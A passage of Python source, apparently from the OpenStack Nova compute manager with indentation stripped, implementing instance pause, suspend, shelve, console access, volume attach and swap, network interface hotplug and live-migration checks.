# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info(_LI('Pausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info(_LI('Unpausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
diags = self.driver.get_instance_diagnostics(instance)
return diags.serialize()
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info(_LI('Resuming'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(
context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown=True):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.strtime()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
if CONF.shelved_offload_time == 0:
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown=True):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
volume backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.destroy(context, instance, network_info,
block_device_info)
instance.power_state = current_power_state
instance.host = None
instance.node = None
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties=None, node=None):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
:param image: an image to build from. If None we assume a
volume backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
self._notify_about_instance_usage(context, instance, 'unshelve.start')
instance.task_state = task_states.SPAWNING
instance.save()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._prep_block_device(context, instance, bdms,
do_check_attach=False)
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self.driver.get_available_nodes()[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
rt = self._get_resource_tracker(node)
limits = filter_properties.get('limits', {})
if image:
shelved_image_ref = instance.image_ref
instance.image_ref = image['id']
image_meta = image
else:
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self._get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, limits):
self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', context=context, instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', context=context, instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self._get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info(_LI("Get console output"), context=context,
instance=instance)
output = self.driver.get_console_output(context, instance)
if tail_length is not None:
output = self._tail_log(output, tail_length)
return output.decode('utf-8', 'replace').encode('ascii', 'replace')
def _tail_log(self, log, length):
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return ''
else:
return '\n'.join(log.split('\n')[-int(length):])
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = str(uuid.uuid4())
if not CONF.vnc_enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.novncproxy_base_url, token)
if CONF.virtualbox.vrde_require_instance_uuid_as_password:
password = instance.uuid
if CONF.virtualbox.vrde_password_length:
password = password[:CONF.virtualbox.vrde_password_length]
access_url = ("%(base_url)s&password=%(password)s" %
{"base_url": access_url, "password": password})
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = str(uuid.uuid4())
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = str(uuid.uuid4())
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = str(uuid.uuid4())
access_url = '%s?token=%s' % (CONF.serial_console.base_url, token)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@object_compat
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type == "serial":
console_info = self.driver.get_serial_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus=None, device_type=None,
return_bdm_object=False):
# NOTE(ndipanov): disk_bus and device_type will be set to None if not
# passed (by older clients) and defaulted by the virt driver. Remove
# default values on the next major RPC version bump.
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
device_name = compute_utils.get_device_name_for_instance(
context, instance, bdms, device)
# NOTE(vish): create bdm here to avoid race condition
bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid,
volume_id=volume_id or 'reserved',
device_name=device_name,
disk_bus=disk_bus, device_type=device_type)
bdm.create()
if return_bdm_object:
return bdm
else:
return device_name
return do_reserve()
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_volume(self, context, volume_id, mountpoint,
instance, bdm=None):
"""Attach a volume to an instance."""
if not bdm:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info(_LI('Attaching volume %(volume_id)s to %(mountpoint)s'),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
do_check_attach=False, do_driver_attach=True)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to attach %(volume_id)s "
"at %(mountpoint)s"),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
self.volume_api.unreserve_volume(context, bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
def _driver_detach_volume(self, context, instance, bdm):
"""Do the actual driver detach using block device mapping."""
mp = bdm.device_name
volume_id = bdm.volume_id
LOG.info(_LI('Detach volume %(volume_id)s from mountpoint %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
connection_info = jsonutils.loads(bdm.connection_info)
# NOTE(vish): We currently don't use the serial when disconnecting,
# but added for completeness in case we ever do.
if connection_info and 'serial' not in connection_info:
connection_info['serial'] = volume_id
try:
if not self.driver.instance_exists(instance):
LOG.warning(_LW('Detaching volume from unknown instance'),
context=context, instance=instance)
encryption = encryptors.get_encryption_metadata(
context, self.volume_api, volume_id, connection_info)
self.driver.detach_volume(connection_info,
instance,
mp,
encryption=encryption)
except exception.DiskNotFound as err:
LOG.warning(_LW('Ignoring DiskNotFound exception while detaching '
'volume %(volume_id)s from %(mp)s: %(err)s'),
{'volume_id': volume_id, 'mp': mp, 'err': err},
instance=instance)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to detach volume %(volume_id)s '
'from %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
self.volume_api.roll_detaching(context, volume_id)
def _detach_volume(self, context, volume_id, instance, destroy_bdm=True):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
"""
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
if CONF.volume_usage_poll_interval > 0:
vol_stats = []
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
try:
vol_stats = self.driver.block_stats(instance, mp)
except NotImplementedError:
pass
if vol_stats:
LOG.debug("Updating volume usage cache with totals",
instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
self.conductor_api.vol_usage_update(context, volume_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance,
update_totals=True)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
if destroy_bdm:
bdm.destroy()
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
self.volume_api.detach(context.elevated(), volume_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance):
"""Detach a volume from an instance."""
self._detach_volume(context, volume_id, instance)
def _init_volume_connection(self, context, new_volume_id,
old_volume_id, connector, instance, bdm):
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
new_cinfo['serial'] = old_cinfo['serial']
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector, old_volume_id,
new_volume_id):
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
resize_to = 0
try:
old_cinfo, new_cinfo = self._init_volume_connection(context,
new_volume_id,
old_volume_id,
connector,
instance,
bdm)
old_vol_size = self.volume_api.get(context, old_volume_id)['size']
new_vol_size = self.volume_api.get(context, new_volume_id)['size']
if new_vol_size > old_vol_size:
resize_to = new_vol_size
self.driver.swap_volume(old_cinfo, new_cinfo, instance, mountpoint,
resize_to)
except Exception:
failed = True
with excutils.save_and_reraise_exception():
if new_cinfo:
msg = _LE("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
context=context,
instance=instance)
else:
msg = _LE("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
context=context,
instance=instance)
self.volume_api.roll_detaching(context, old_volume_id)
self.volume_api.unreserve_volume(context, new_volume_id)
finally:
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
self.volume_api.terminate_connection(context,
conn_volume,
connector)
# If Cinder initiated the swap, it will keep
# the original ID
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
return (comp_ret, new_cinfo)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance):
"""Swap volume for an instance."""
context = context.elevated()
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, old_volume_id, instance_uuid=instance.uuid)
connector = self.driver.get_volume_connector(instance)
comp_ret, new_cinfo = self._swap_volume(context, instance,
bdm,
connector,
old_volume_id,
new_volume_id)
save_volume_id = comp_ret['save_volume_id']
# Update bdm
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'delete_on_termination': False,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'volume_size': None,
'no_device': None}
bdm.update(values)
bdm.save()
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove a volume connection using the volume api."""
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# NOTE(PhilDay): Can't use object_compat decorator here as
# instance is not the second parameter
if isinstance(instance, dict):
metas = ['metadata', 'system_metadata']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=metas)
instance._context = context
try:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
except exception.NotFound:
pass
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip)
if len(network_info) != 1:
LOG.error(_LE('allocate_port_for_instance returned %(ports)s '
'ports'), dict(ports=len(network_info)))
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
try:
self.driver.attach_interface(instance, image_meta, network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
LOG.warn(_LW("attach interface failed , try to deallocate "
"port %(port_id)s, reason: %(msg)s"),
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warn(_LW("deallocate port %(port_id)s failed"),
{'port_id': port_id}, instance=instance)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
return network_info[0]
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
try:
self.driver.detach_interface(instance, condemned)
except exception.NovaException as ex:
LOG.warning(_LW("Detach interface failed, port_id=%(port_id)s,"
" reason: %(msg)s"),
{'port_id': port_id, 'msg': ex}, instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning(_LW('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s'),
{'port_id': port_id, 'error': ex},
instance=instance)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
Returns True if instance disks located on shared storage and
False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing migration info
"""
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
migrate_data = {}
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.check_can_live_migrate_destination_cleanup(ctxt,
dest_check_data)
if 'migrate_data' in dest_check_data:
migrate_data.update(dest_check_data['migrate_data'])
return migrate_data
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
is_volume_backed = self.compute_api.is_volume_backed_instance(ctxt,
instance)
dest_check_data['is_volume_backed'] = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=True)
return self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which holds data
required for live migration without shared
storage.
"""
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
pre_live_migration_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
# Creating filters to hypervisors and firewalls.
# An example is that nova-instance-instance-xxx,
# which is written to libvirt.xml(Check "virsh nwfilter-list")
# This nwfilter is necessary on the destination host.
# In addition, this method is creating filtering rule
# onto destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
return pre_live_migration_data
@wrap_exception()
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migrate_data):
"""Executing live migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: implementation specific params
"""
# NOTE(danms): since instance is not the first parameter, we can't
# use @object_compat on this method. Since this is the only example,
# we do this manually instead of complicating the decorator
if not isinstance(instance, obj_base.NovaObject):
expected = ['metadata', 'system_metadata',
'security_groups', 'info_cache']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=expected)
# Create a local copy since we'll be modifying the dictionary
migrate_data = dict(migrate_data or {})
try:
if block_migration:
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
pre_migration_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
migrate_data['pre_live_migration_result'] = pre_migration_data
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Pre live migration failed at %s'),
dest, instance=instance)
self._rollback_live_migration(context, instance, dest,
block_migration, migrate_data)
# Executing live migration
# live_migration might raises exceptions, but
# nothing must be recovered in this version.
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
def _live_migration_cleanup_flags(self, block_migration, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
Block migration needs empty image at destination host before migration
starts, so if any failure occurs, any empty images has to be deleted.
Also Volume backed live migration w/o shared storage needs to delete
newly created instance-xxx dir on the destination as a part of its
rollback process
:param block_migration: if true, it was a block migration
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(angdraug): block migration wouldn't have been allowed if either
# block storage or instance path were shared
is_shared_block_storage = not block_migration
is_shared_instance_path = not block_migration
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', is_shared_block_storage)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', is_shared_instance_path)
# No instance booting at source host, but instance dir
# must be deleted for preparing next block migration
# must be deleted for preparing next live migration w/o shared storage
do_cleanup = block_migration or not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
